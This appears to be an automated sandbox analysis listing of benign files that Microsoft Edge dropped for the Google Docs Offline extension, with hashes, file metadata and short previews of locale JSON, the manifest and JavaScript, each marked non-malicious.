                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):11280
                                                                                                                                                                                                      Entropy (8bit):5.751992630887702
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                      MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                      SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                      SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                      SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                      Entropy (8bit):5.417833205646285
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                      MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                      SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                      SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                      SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):98880
                                                                                                                                                                                                      Entropy (8bit):5.414989230634404
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                      MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                      SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                      SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                      SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):107677
                                                                                                                                                                                                      Entropy (8bit):5.396220758526552
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                      MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                      SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                      SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                      SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                      Malicious:false
